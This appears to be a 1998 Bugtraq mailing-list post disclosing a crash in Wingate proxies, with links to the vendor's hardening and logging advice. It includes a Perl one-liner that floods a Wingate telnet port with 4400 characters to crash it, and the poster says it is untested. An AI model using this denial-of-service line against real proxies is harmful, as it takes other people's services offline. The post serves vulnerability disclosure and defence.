[8556] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

crashing wingates

daemon@ATHENA.MIT.EDU (G23)
Sat Nov 14 16:50:39 1998

Date: 	Sat, 14 Nov 1998 13:51:30 -0500
Reply-To: G23 <g23@USA.NET>
From: G23 <g23@USA.NET>
To: BUGTRAQ@NETSPACE.ORG

Hello,

The following one-liner will crash an open Wingate.

perl -MIO::Socket -e \
'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
->send("X" x 4400 . "\n",0)'

Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable.  The above is my rendition of a 44 line sh script written by "rEWTED" (kefka@infected.org).

Anyone configuring a proxy for LAN use should only bind to an internal
interface anyway.  (IE, kidz shouldn't even see your proxy)
http://wingate.net/helppages/wingate2Securing_your_network.html

If you do provide telnet proxy for the world, then at least log.
http://wingate.net/helppages/wingate2Auditing_and_Logging.html

ghost23

____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[8556] in bugtraq

crashing wingates

daemon@ATHENA.MIT.EDU (G23)Sat Nov 14 16:50:39 1998

daemon@ATHENA.MIT.EDU (G23)
Sat Nov 14 16:50:39 1998